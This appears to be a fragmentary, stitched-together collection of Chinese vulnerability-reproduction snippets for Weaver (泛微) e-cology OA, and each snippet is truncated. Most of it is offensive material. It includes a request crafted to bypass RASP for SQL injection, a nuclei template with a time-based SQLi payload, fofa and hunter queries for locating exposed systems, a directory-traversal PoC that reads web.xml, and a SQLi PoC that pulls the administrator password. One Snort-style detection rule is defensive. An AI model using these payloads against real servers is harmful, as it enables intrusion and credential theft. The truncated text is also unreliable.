因泛微 OA 启用了 RASP,同一个执行语句第二次注入就会被拦截,因此需要不断修改请求包。给出绕过的请求包: POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Co...
sqli requests: - raw: - | POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1 matchers: - type: dsl dsl: - '...
alert tcp any any -> any any (msg:"Weaver E-Cology SQLi"; content:"weaver\.file\.FileDownloadForOutDoc"; http_uri; content:"isFromOutImg=1"; content:"fileid="; pcre:"/\bselect\b/i"; classtype:web-application-attack; sid:1000002; rev:1;) ...
漏洞复现 fofa查询语法:app="泛微-协同办公OA" 鹰图查询语法:app.name="泛微 e-cology 9.0 OA" 登录页面如下: POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml nuclei批量yaml文件 id:ecology-filedownload-directory-traversalinfo:name:Ecology-LocalFileInclusionauthor:princechaddhaseverity:high...
泛微OA V8存在前台sql注入漏洞,攻击者可以通过该漏洞获取管理员权限和服务器权限。 影响版本 泛微OA V8 漏洞复现 fofa语法:app="泛微-协同办公OA" POC: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager ...